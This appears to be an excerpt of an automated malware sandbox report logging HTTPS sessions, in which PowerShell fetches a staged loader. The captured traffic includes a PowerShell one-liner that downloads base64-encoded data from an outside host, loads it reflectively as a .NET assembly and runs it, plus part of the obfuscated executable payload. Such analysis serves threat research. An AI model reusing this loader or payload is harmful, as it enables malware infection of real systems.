                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.749707203.101.184.1184431928C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:58:27 UTC661OUTGET /site/404 HTTP/1.1
                                                                                                                                                                    Host: pmo.gov.pk
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                    2024-09-30 16:58:27 UTC541INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:38:20 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/7.4.14
                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                    Set-Cookie: cookiesession1=678B28B3B2979C8EA40140B962781A42;Expires=Tue, 30 Sep 2025 16:58:27 GMT;Path=/;HttpOnly
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-XSS-Protection: 1
                                                                                                                                                                    Content-Security-Policy: self
                                                                                                                                                                    Feature-Policy: self
                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                    2024-09-30 16:58:27 UTC527INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.749706203.101.184.1184431928C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:58:28 UTC603OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                    Host: pmo.gov.pk
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                    Cookie: cookiesession1=678B28B3B2979C8EA40140B962781A42
                                                                                                                                                                    2024-09-30 16:58:28 UTC426INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:38:20 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/7.4.14
                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-XSS-Protection: 1
                                                                                                                                                                    Content-Security-Policy: self
                                                                                                                                                                    Feature-Policy: self
                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                    2024-09-30 16:58:28 UTC527INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.749715172.67.149.94437884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:58:32 UTC176OUTGET /DSCTSC/ HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                    Host: ofc.mofserviceserver.top
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-09-30 16:58:33 UTC843INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:33 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%209%3A58%20PM; expires=Tue, 30-Sep-2025 16:58:33 GMT; Max-Age=31536000
                                                                                                                                                                    Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:33 GMT; Max-Age=1209600
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evCj1nuVdRclzmAbWoGd5cpIf8ULNMyJ8vaKL3bSC9cfXvAiGFnHouayMOOqiriePgjvTSYG0%2FptD1v9%2Fzz5qYbR4fOTOCtCKZDc392sC%2FQPIrBcXzHfEqfocK8P8nGgwJglvR5W8aHZq5Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8cb5c2233e7e4369-EWR
                                                                                                                                                                    2024-09-30 16:58:33 UTC235INData Raw: 65 35 0d 0a 24 73 74 72 69 6e 67 20 3d 20 69 72 6d 20 20 28 27 68 74 74 70 3a 2f 2f 63 6c 6f 75 64 2e 64 65 6c 6c 69 63 6f 6e 2e 74 6f 70 2f 31 30 30 30 2f 35 30 30 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 5e 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 55 70 64 61 74 65 4d 65 27 29 3b 0a 0d 0a
                                                                                                                                                                    Data Ascii: e5$string = irm ('http://cloud.dellicon.top/1000/500/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');
                                                                                                                                                                    2024-09-30 16:58:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.74971852.165.165.26443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:58:36 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+RXM+ul9gZsDE19&MD=3r6m3nSv HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                    2024-09-30 16:58:36 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Expires: -1
                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                    MS-CorrelationId: 7a83869a-5bfa-4239-9641-cf090d365b82
                                                                                                                                                                    MS-RequestId: 2caaf45a-238d-4ec4-9b59-d167a252cbfc
                                                                                                                                                                    MS-CV: F2HfFXwDn06uXrn0.0
                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:36 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                    2024-09-30 16:58:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                    2024-09-30 16:58:36 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.749721188.114.97.34438136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-09-30 16:58:36 UTC172OUTGET /1000/500/ HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                    Host: cloud.dellicon.top
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-09-30 16:58:37 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:58:37 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8aIsvG54KIhpzRiPgpYMGpP5xyxcj5opLuSZXcaErPHuIuwqihRM2D0XpLIEInFVMjsO3%2F82sMgNuDD5ZYc0pF565NSE9DyFBw8sHdwXSpOdM2g94VLNfN1%2BU5Ns%2Bf1aTmnohiY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8cb5c23d3c8d4241-EWR
                                                                                                                                                                    2024-09-30 16:58:37 UTC755INData Raw: 37 64 33 38 0d 0a 54 56 71 51 41 5e 41 4d 41 41 41 5e 41 45 41 41 41 5e 41 2f 2f 38 41 5e 41 4c 67 41 41 5e 41 41 41 41 41 5e 41 41 51 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 67 41 41 41 41 5e 41 34 66 75 67 5e 34 41 74 41 6e 5e 4e 49 62 67 42 5e 54 4d 30 68 56 5e 47 68 70 63 79 5e 42 77 63 6d 39 5e 6e 63 6d 46 74 5e 49 47 4e 68 62 5e 6d 35 76 64 43 5e 42 69 5a 53 42 5e 79 64 57 34 67 5e 61 57 34 67 52 5e 45 39 54 49 47 5e 31 76 5a 47 55 5e 75 44 51 30 4b 5e 4a 41 41 41 41 5e 41 41 41 41 41 5e 42 51 52 51 41 5e 41 54 41 45 44 5e 41 45 50 56 75 5e 57 59 41 41 41 5e 41 41 41 41 41 5e 41 41 4f 41 41 5e 44 69 45 4c 41 5e 54 41 41
                                                                                                                                                                    Data Ascii: 7d38TVqQA^AMAAA^AEAAA^A//8A^ALgAA^AAAAA^AAQAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^gAAAA^A4fug^4AtAn^NIbgB^TM0hV^Ghpcy^Bwcm9^ncmFt^IGNhb^m5vdC^BiZSB^ydW4g^aW4gR^E9TIG^1vZGU^uDQ0K^JAAAA^AAAAA^BQRQA^ATAED^AEPVu^WYAAA^AAAAA^AAOAA^DiELA^TAA
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 5e 43 41 49 41 41 5e 41 43 41 41 41 5e 41 34 41 63 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 51 41 41 41 5e 51 67 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 77 2b 5e 41 63 41 41 41 5e 41 41 41 45 67 5e 41 41 41 41 43 5e 41 41 55 41 6c 5e 44 34 46 41 4a 5e 42 41 41 67 41 5e 42 41 41 41 41 5e 41 41 41 41 41 5e 43 52 2f 42 77 5e 41 75 64 67 41 5e 41 4f 76 63 48 5e 41 49 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 42 5e 4d 77 41 77 44 5e 77 41 41 41 41 5e 41 51 41 41 45 5e 53 73 46 4b 43 5e 4c 6f 43 32 63 5e 67 42 51 41 41 5e 41 50 34 4f 41 5e 41 41 34 41 41 5e 41 41 41 50 34 5e 4d 41
                                                                                                                                                                    Data Ascii: ^CAIAA^ACAAA^A4AcA^AAAAA^AAAAA^AAAAA^AQAAA^QgAAA^AAAAA^AAAAA^AAAAA^AAAw+^AcAAA^AAAEg^AAAAC^AAUAl^D4FAJ^BAAgA^BAAAA^AAAAA^CR/Bw^AudgA^AOvcH^AIAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAB^MwAwD^wAAAA^AQAAE^SsFKC^LoC2c^gBQAA^AP4OA^AA4AA^AAAP4^MA
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 53 5a 2b 57 41 5e 49 41 42 43 6a 5e 30 42 77 41 47 5e 4b 42 49 41 41 5e 41 59 6c 4a 6e 5e 35 5a 41 67 41 5e 45 4b 50 67 48 5e 41 41 59 6c 4a 5e 69 43 69 41 41 5e 41 41 4b 42 45 5e 41 41 41 59 6c 5e 4a 69 43 6c 41 5e 41 41 41 4b 4b 5e 6b 42 41 41 59 5e 6c 4a 6e 35 61 5e 41 67 41 45 4b 5e 50 77 48 41 41 5e 61 41 42 77 41 5e 41 42 43 41 46 5e 41 41 41 41 66 5e 68 49 43 41 41 5e 52 37 53 41 49 5e 41 42 44 72 51 5e 2f 76 2f 2f 4a 5e 69 41 45 41 41 5e 41 41 4f 4d 58 5e 2b 2f 2f 38 6f 5e 44 41 41 41 42 5e 69 41 41 41 41 5e 41 41 66 68 49 5e 43 41 41 52 37 5e 37 51 45 41 42 5e 44 6d 73 2f 76 5e 2f 2f 4a 69 41 5e 42 41 41 41 41 5e 4f 4b 48 2b 2f 5e 2f 38 58 4b 42 5e 45 41 41 41 61 5e 41 41 77 41 41 5e 42 43 41 41 41 5e 41 41 41 66 68 5e 49 43 41 41 52 5e 37 42 77
                                                                                                                                                                    Data Ascii: SZ+WA^IABCj^0BwAG^KBIAA^AYlJn^5ZAgA^EKPgH^AAYlJ^iCiAA^AAKBE^AAAYl^JiClA^AAAKK^kBAAY^lJn5a^AgAEK^PwHAA^aABwA^ABCAF^AAAAf^hICAA^R7SAI^ABDrQ^/v//J^iAEAA^AAOMX^+//8o^DAAAB^iAAAA^AAfhI^CAAR7^7QEAB^Dms/v^//JiA^BAAAA^OKH+/^/8XKB^EAAAa^AAwAA^BCAAA^AAAfh^ICAAR^7Bw
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 52 37 35 67 5e 45 41 42 44 72 5e 50 2f 2f 2f 2f 5e 4a 69 41 42 41 5e 41 41 41 4f 4d 5e 54 2f 2f 2f 38 5e 41 45 51 68 2b 5e 43 67 41 41 42 5e 48 35 64 41 67 5e 41 45 4b 41 67 5e 49 41 41 59 67 5e 41 41 41 41 41 5e 48 34 53 41 67 5e 41 45 65 77 77 5e 43 41 41 51 35 5e 44 77 41 41 41 5e 43 59 67 41 41 5e 41 41 41 44 67 5e 45 41 41 41 41 5e 2f 67 77 4c 41 5e 45 55 45 41 41 5e 41 41 42 51 41 5e 41 41 46 73 41 5e 41 41 43 54 41 5e 41 41 41 4e 51 5e 41 41 41 44 67 5e 41 41 41 41 41 5e 45 51 68 2b 43 5e 77 41 41 42 48 5e 35 65 41 67 41 5e 45 4b 41 77 49 5e 41 41 59 67 41 5e 51 41 41 41 48 5e 34 53 41 67 41 5e 45 65 79 6f 43 5e 41 41 51 35 77 5e 66 2f 2f 2f 79 5e 59 67 41 51 41 5e 41 41 44 69 32 5e 2f 2f 2f 2f 63 5e 78 4d 41 41 41 5e 6f 54 41 69 41 5e 43 41 41 41
                                                                                                                                                                    Data Ascii: R75g^EABDr^P////^JiABA^AAAOM^T///8^AEQh+^CgAAB^H5dAg^AEKAg^IAAYg^AAAAA^H4SAg^AEeww^CAAQ5^DwAAA^CYgAA^AAADg^EAAAA^/gwLA^EUEAA^AABQA^AAFsA^AACTA^AAANQ^AAADg^AAAAA^EQh+C^wAABH^5eAgA^EKAwI^AAYgA^QAAAH^4SAgA^EeyoC^AAQ5w^f///y^YgAQA^AADi2^////c^xMAAA^oTAiA^CAAA
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 64 4d 51 5e 45 41 41 42 45 5e 43 4f 6c 30 41 5e 41 41 41 67 41 5e 51 41 41 41 48 5e 34 53 41 67 41 5e 45 65 79 6b 43 5e 41 41 51 36 44 5e 77 41 41 41 43 5e 59 67 41 41 41 5e 41 41 44 67 45 5e 41 41 41 41 2f 5e 67 77 46 41 45 5e 55 44 41 41 41 5e 41 4b 51 41 41 5e 41 41 55 41 41 5e 41 41 2f 41 41 5e 41 41 4f 43 51 5e 41 41 41 41 34 5e 4e 51 41 41 41 5e 43 41 41 41 41 5e 41 41 66 68 49 5e 43 41 41 52 37 5e 43 41 49 41 42 5e 44 6e 52 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 4d 62 2f 2f 5e 2f 38 52 41 6e 5e 35 6a 41 67 41 5e 45 4b 43 41 49 5e 41 41 59 67 41 5e 67 41 41 41 44 5e 69 77 2f 2f 2f 5e 2f 33 42 45 49 5e 4f 69 77 41 41 5e 41 41 67 41 77 5e 41 41 41 50 34 5e 4f 44 51 41 34 5e 41 41 41 41 41 5e 50 34 4d 44 51 5e 42 46 42 41 41 5e 41 41 47 67 41
                                                                                                                                                                    Data Ascii: dMQ^EAABE^COl0A^AAAgA^QAAAH^4SAgA^EeykC^AAQ6D^wAAAC^YgAAA^AADgE^AAAA/^gwFAE^UDAAA^AKQAA^AAUAA^AA/AA^AAOCQ^AAAA4^NQAAA^CAAAA^AAfhI^CAAR7^CAIAB^DnR//^//JiA^AAAAA^OMb//^/8RAn^5jAgA^EKCAI^AAYgA^gAAAD^iw///^/3BEI^OiwAA^AAgAw^AAAP4^ODQA4^AAAAA^P4MDQ^BFBAA^AAGgA
                                                                                                                                                                    2024-09-30 16:58:37 UTC1369INData Raw: 41 41 5e 51 6f 4e 41 67 5e 41 42 69 55 6d 5e 45 77 30 67 41 5e 41 41 41 41 48 5e 34 53 41 67 41 5e 45 65 78 34 43 5e 41 41 51 36 44 5e 77 41 41 41 43 5e 59 67 41 41 41 5e 41 41 44 67 45 5e 41 41 41 41 2f 5e 67 77 4f 41 45 5e 55 42 41 41 41 5e 41 42 51 41 41 5e 41 44 67 41 41 5e 41 41 41 33 54 5e 2f 2b 2f 2f 38 5e 52 42 44 71 66 5e 41 41 41 41 49 5e 41 41 41 41 41 5e 42 2b 45 67 49 5e 41 42 48 76 75 5e 41 51 41 45 4f 5e 67 38 41 41 41 5e 41 6d 49 41 41 5e 41 41 41 41 34 5e 42 41 41 41 41 5e 50 34 4d 43 41 5e 42 46 42 67 41 5e 41 41 46 41 41 5e 41 41 42 7a 41 5e 41 41 41 42 51 5e 41 41 41 46 38 5e 41 41 41 41 6c 5e 41 41 41 41 46 5e 51 41 41 41 44 5e 68 4c 41 41 41 5e 41 30 42 6f 41 5e 41 41 59 6d 49 5e 41 51 41 41 41 5e 41 34 7a 76 2f 5e 2f 2f 78 63 36 5e
                                                                                                                                                                    Data Ascii: AA^QoNAg^ABiUm^Ew0gA^AAAAH^4SAgA^Eex4C^AAQ6D^wAAAC^YgAAA^AADgE^AAAA/^gwOAE^UBAAA^ABQAA^ADgAA^AAA3T^/+//8^RBDqf^AAAAI^AAAAA^B+EgI^ABHvu^AQAEO^g8AAA^AmIAA^AAAA4^BAAAA^P4MCA^BFBgA^AAFAA^AABzA^AAABQ^AAAF8^AAAAl^AAAAF^QAAAD^hLAAA^A0BoA^AAYmI^AQAAA^A4zv/^//xc6^
